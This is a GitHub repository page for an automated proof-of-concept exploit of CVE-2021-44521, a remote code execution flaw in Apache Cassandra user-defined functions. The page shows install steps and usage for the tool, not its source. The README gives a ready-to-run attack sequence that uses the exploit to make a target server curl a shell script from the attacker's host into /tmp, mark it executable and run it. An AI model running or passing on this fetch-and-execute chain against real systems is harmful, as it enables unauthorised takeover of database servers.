Skip to content

WoodenKlaas/CVE-2021-44521

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
poc.py
poc.py
 
 

Repository files navigation

CVE-2021-44521

Automated PoC of CVE-2021-44521 Credits to original poc: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/

Requirements

Cassandra-driver

pip3 install cassandra-driver

Usage

python3 poc.py <ip> <cmd>

Note that you can't do more command at a time, neither use pipes as of yet. So run

pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"

About

Automated PoC of CVE-2021-44521

Resources

Readme
Activity

Stars

9 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages